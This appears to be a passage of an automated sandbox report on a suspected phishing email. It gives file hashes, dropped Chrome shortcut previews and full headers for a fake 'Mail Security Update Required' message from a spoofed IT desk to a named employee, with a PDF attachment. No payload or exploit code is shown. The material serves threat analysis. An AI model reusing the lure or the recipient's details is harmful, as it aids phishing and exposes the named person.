                                            Entropy (8bit):3.9945094318747794
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:55E9EF02B553B2A4A2D844820F24F574
                                            SHA1:1FDE0EC17E2847C3273DE8A8B036512AC2287D24
                                            SHA-256:C067642E7A4EB166E05A2FEE68D86FD05A30105C4EBF65F896D26B95E81A3A9F
                                            SHA-512:E9AAB48E1BDBF7F345A49B50DE720C4CC48E00D21929B1AA8AA6D383A8086F795D918DC2ACB77355AB4B73C475524173C2F92D6FD7EBDE194FC1BCD89269C295
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:L..................F.@.. ...$+.,....X.......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.~....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.~....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.~....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.~..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.~...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........L7-......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 27 14:55:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                            Category:dropped
                                            Size (bytes):2679
                                            Entropy (8bit):4.002548436704456
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:392D11A12BA3BBBBD9A1CF537DBD0D68
                                            SHA1:F70A1C3D09C4D2405134C95E7F05FCA11C4EF405
                                            SHA-256:895986E817D912C2705A7F6DD7DF358E1A88F9E3FAD6B0A60ACA8E220D2C7E24
                                            SHA-512:4AF894F64EC31606D3FC77A307079B5F1FFD6B52ABA54A6A17A714230CA8D221E6B51C5D97F6D30AC4B84435444B33B9D8DB44B3E2607249AC21F1935B34F9AE
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:L..................F.@.. ...$+.,....t.......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.~....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.~....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.~....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.~..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.~...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........L7-......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                            File type:CDFV2 Microsoft Outlook Message
                                            Entropy (8bit):3.86245422183053
                                            TrID:
                                            • Outlook Message (71009/1) 58.92%
                                            • Outlook Form Template (41509/1) 34.44%
                                            • Generic OLE2 / Multistream Compound File (8008/1) 6.64%
                                            File name:Murexltd Mail Security Update Required For gjohnson@murexltd.com.msg
                                            File size:56'320 bytes
                                            MD5:30fecd626c4847d7896d1dc0e9eca992
                                            SHA1:64f7974ffe2bd1addf0219565a9eb594ed00d769
                                            SHA256:774b494a1ddc338f3d5292872dd868c4eb8bc129c545de803fbbfee1d69cb396
                                            SHA512:748b1b424ae0600d01904f5dc42748bb8170492dffdcbd617974f3712af8afd43f4147f4179d43d69212030198c4a2a35ec045ba597869a548d6e0edd8ec3073
                                            SSDEEP:1536:z9QwvKrCar6X6VrHJr/vNTrArvr99QWrwr80t10q1:z9tvACQ6X6BHl/vNn+T99Ru80t10q1
                                            TLSH:DE43CD2436EA4619F277DF3249F29087DA367D92AD119E4F2191334E0972A41ECB1F3B
                                            File Content Preview:........................>......................................................................................................................................................................................................................................
                                            Subject:Murexltd Mail Security Update Required For gjohnson@murexltd.com
                                            From:IT Service Desk <support@e-fukuyoshi.com>
                                            To:Gordon Johnson <GJohnson@murexltd.com>
                                            Cc:
                                            BCC:
                                            Date:Tue, 27 Aug 2024 16:19:46 +0200
                                            Communications:
                                              Attachments:
                                              • New Security Update.pdf
                                              Key Value
                                              Receivedfrom [127.0.0.1] (unknown [104.215.54.124]) by smtp2.kagoya.net
                                              (260310b6:907:1::28) with Microsoft SMTP Server (version=TLS1_2,
                                              HTTPS; Tue, 27 Aug 2024 1419:55 +0000
                                              Aug 2024 1419:53 +0000
                                              Frontend Transport; Tue, 27 Aug 2024 1419:53 +0000
                                              id 15.20.7939.2 via Frontend Transport; Tue, 27 Aug 2024 1419:52 +0000
                                              mx-inbound22-191.us-east-2b.ess.aws.cudaops.com; Tue, 27 Aug 2024 1419:48
                                              27 Aug 2024 2319:47 +0900 (JST)
                                              Authentication-Resultsspf=softfail (sender IP is 209.222.82.242)
                                              Received-Spfpass (mx-inbound22-191.us-east-2b.ess.aws.cudaops.com: domain
                                              Content-Typemultipart/mixed;
                                              Content-Transfer-Encoding7bit
                                              Content-Dispositionattachment
                                              FromIT Service Desk <support@e-fukuyoshi.com>
                                              ToGordon Johnson <GJohnson@murexltd.com>
                                              Subject=?UTF-8?B?TXVyZXhsdGQgTWFpbCBTZWN1cml0eSBVcGRhdGUgUmVxdWlyZWQg?=
                                              Message-Id<c250974e-6aa9-ccb0-29c8-3babfc9f1733@e-fukuyoshi.com>
                                              X-Priority1 (Highest)
                                              X-Msmail-PriorityHigh
                                              ImportanceHigh
                                              DateTue, 27 Aug 2024 14:19:46 +0000
                                              MIME-Version1.0
                                              X-Bess-Id1724768388-105823-12647-10726-1
                                              X-Bess-Ver2019.1_20240823.2008
                                              X-Bess-Apparent-Source-Ip153.127.234.4
                                              X-Bess-PartsH4sIAAAAAAACA4uuVkqtKFGyUirNy1bSUcovVrIytTAzBLIygILGyZZmBobJBk
                                              X-Bess-Spam-StatusSCORE=0.50 using domain:184201 scores of
                                              X-Bess-Spam-Score0.50
                                              Authentication-Results-Originalmx-inbound22-191.us-east-2b.ess.aws.cudaops.com; spf=pass (sender IP is
                                              X-Bess-Spam-ReportCode version 3.2, rules version 3.2.2.258630 [from
                                              -------------------------------- 0.00 MISSING_MIMEOLE METAMessage
                                              MIMEHEADERCustom Rule ATTACH_EXT_DOT1
                                              X-Bess-Brts-Status1
                                              Return-Pathsupport@e-fukuyoshi.com
                                              X-Ms-Exchange-Organization-Expirationstarttime27 Aug 2024 14:19:52.8051
                                              X-Ms-Exchange-Organization-ExpirationstarttimereasonOriginalSubmit
                                              X-Ms-Exchange-Organization-Expirationinterval1:00:00:00.0000000
                                              X-Ms-Exchange-Organization-ExpirationintervalreasonOriginalSubmit
                                              X-Ms-Exchange-Organization-Network-Message-Id91f9ed6a-98ef-4799-4eab-08dcc6a35170
                                              X-Eopattributedmessage0
                                              X-Eoptenantattributedmessaged5ea0ba6-3c9e-43c2-9d1e-fffeb0d842e5:0
                                              X-Ms-Exchange-Organization-MessagedirectionalityIncoming
                                              X-Ms-PublictraffictypeEmail
                                              X-Ms-TraffictypediagnosticSJ1PEPF000023D8:EE_|LV8PR16MB6571:EE_|PH7PR16MB6043:EE_
                                              X-Ms-Exchange-Organization-AuthsourceSJ1PEPF000023D8.namprd21.prod.outlook.com
                                              X-Ms-Exchange-Organization-AuthasAnonymous
                                              X-Ms-Office365-Filtering-Correlation-Id91f9ed6a-98ef-4799-4eab-08dcc6a35170
                                              X-Ms-Exchange-Organization-Scl-1
                                              X-Ipw-GroupmemberFalse
                                              X-Microsoft-AntispamBCL:0;ARA:13230040|12012899012|41022699024|43540500003;
                                              X-Forefront-Antispam-ReportCIP:209.222.82.242;CTRY:US;LANG:en;SCL:-1;SRV:;IPV:NLI;SFV:NSPM;H:outbound-ip76b.ess.barracuda.com;PTR:outbound-ip76b.ess.barracuda.com;CAT:NONE;SFS:(13230040)(12012899012)(41022699024)(43540500003);DIR:INB;
                                              X-Ms-Exchange-Crosstenant-Originalarrivaltime27 Aug 2024 14:19:52.3676
                                              X-Ms-Exchange-Crosstenant-Network-Message-Id91f9ed6a-98ef-4799-4eab-08dcc6a35170
                                              X-Ms-Exchange-Crosstenant-Idd5ea0ba6-3c9e-43c2-9d1e-fffeb0d842e5
                                              X-Ms-Exchange-Crosstenant-AuthsourceSJ1PEPF000023D8.namprd21.prod.outlook.com
                                              X-Ms-Exchange-Crosstenant-AuthasAnonymous
                                              X-Ms-Exchange-Crosstenant-FromentityheaderInternet
                                              X-Ms-Exchange-Transport-CrosstenantheadersstampedLV8PR16MB6571
                                              X-Ms-Exchange-Transport-Endtoendlatency00:00:03.2888359
                                              X-Ms-Exchange-Processed-By-Bccfoldering15.20.7897.019
                                              X-Microsoft-Antispam-Mailbox-Deliveryucf:0;jmr:0;auth:0;dest:I;ENG:(910001)(944506478)(944626604)(920097)(930097)(140003);
                                              X-Microsoft-Antispam-Message-Infob4b3DyCEv2i5JJpeLvJL93IH6CH/3/CRLyTtbhVGKoh98WdytC03NZMPGLu51nAQU46mN31Fokm396V1R1Q5rhryTGBdG6Ae2uScSpzNzch2l5Cdemv6IffaWttNzMDFDsgTURpiSkRi+4q7kkrSo8yeorsRqwn8knyZolw3uvpiRP9GGjdo9C6Tb1B9rOGJyA2UaDqIurOSW2yPkuQWGqFz2bpzoauQG8NOdlEabcXfDcF6dinfUH8w1cshRESMUGlhc4ZnuPDFybHewL1gRo7CQ0LM6qU9Nzm+Oilu33QaxQZ/wsqyQk7l2wrGdX5rIpzsErouseH+fhEgeZQPhFc7YTil7Q2Er9+ZyUmlaUYhX6TNnNzdv/MpcW7YpA4PZPU5fudf6vkfQRBKCL+adbiFd9+6wijW7xVI/04iYzLK4ALa4/Q0zVy7LJB9fz+/qjwY8thHzscW4ckpzyOPoRyIKSUZufmERBDHvISL7Vt56RkScYl+PNqYVOeNea4wT7XhU+8r8R5+eNOKR/T5YhUVtWVlMg7evGrYH3AZefi84l1HEL6bZ8GJyUP/XKJtIR1SWRbwhinxLzrEwsONpF9zEmYXr4OTlr795SU8ZvUbVvzvJM5+DrLSevI0pthZl4exEa8YD53l4WCwJ9wBWyHoaII4i4avasvv8mzNn5Ok3XCvI2lEiBMtVBia9gKYZBLYRBfYOPRopJhEl7Rl8EYo4f/62m5MQa68ULGm/7P7qIOaDmx1g4/nSmVJta4mD9E5JxWpQaH5qjcvPD2VlwckQy8dqaw0sSK8PKrm1ETgUZPirhnXNVDLM2m8dIdKN/bBVpGAXT6oiwT6chW0Hd2x/irfM+rEmq6v+ywYDdnT62L3kdVs41Vuj1MYY9gs1LU1UF+95aG1Q4pIteRnRjMrf7IowkdVr2IK85zJTsK0uCLPjm0zxlglLAltqghYgNR5irDfZ7XQ+LxcZxGu2Zd9dm2qDPPU+1b4o1+IaZzkTZ9nv7dh+Qe6UyXxbgCBNidFCa996bL6dcBa2NRhuG2PJMoHeC+IS/isJcFzaE2kjpDVLp+yH31na6pIFuHe05wd89R85GgWaf2ttvgMQNIj1bUxNQ1M2SghZxeRoWg154wX3eynPZ+drCDpKAQECIU6d4jmIEl7ja10zjDdT7GMHPJXKIdWVczJ+CXJ+EnNhNky+bIGmr1SX8zIdefbHJuiSBB1FOEiBngE81LSlfYNMpouwGFqou09YSkynejb9Oos+hklallSnRveSZH7rlNatCaG2U7uzU3VcWfcmVAIxKX8XPHUPtmZIsJxD1AbqWuigI2O8Xe4yEWteDmw/WC/G52g9QhXPnm30cBop9n7ZeRGNaGgZ40FB+mHMMZvYPwK6PcfGvygxKMxL0AQyS0feyOaGcbwo8yotmRzwOm33O6WP/iubPmllzd4V1fD6U2X8aVdz9rfyLMgzBs+OcKtmV0ieLGBbGMqJ8q+ZfJ01u4vyjtPJVLQIXxizn5kteILQ0fWKhmE2qHGYduhi0fnPWf6r/VMPm+2T2Jx3KcqOe2ym6wPJEzGkNMqDYOiKkhXKLT+fS9pKXzYsDofrlpub9hI3gzt13mKX/rtawdzTSVUc+7FU7kFH3KCcOSVdds7l/ujrfWM45lOKsy7c8pdii74oCJzblHWRLhg1rT4CX/XZWZFi18WcAFXiZGI9xuG9Dvtado5qw3hbIRmBqVVxkG6P/HYc7Agvw+r/K2IcvqGDBk65fcp4A6fQgJNj2lqHfBkjHKHtsaEA38u0qaFahD+uoprOMcT7ivda+te3ptkRb4drRH5STqO7zkdQ162MeB2WOF5LIY0J9/G0PNfxAKJ3h1Ya/0lQ3u2p2F1lpGKg0rGQ0iMP1z99L2Hi6eadjKEr04aAUSMEocT4/VCcMfo3+ffly/5nQGAZOaX1dHLFjZVLruVuygl5AfyKLYLTuPyVVRQwM86RyOzlMb3t6TQWAioYX2KLXMQWp7oPBHh1S2wALe3DI6QOss=
                                              dateTue, 27 Aug 2024 16:19:46 +0200

                                              Icon Hash:c4e1928eacb280a2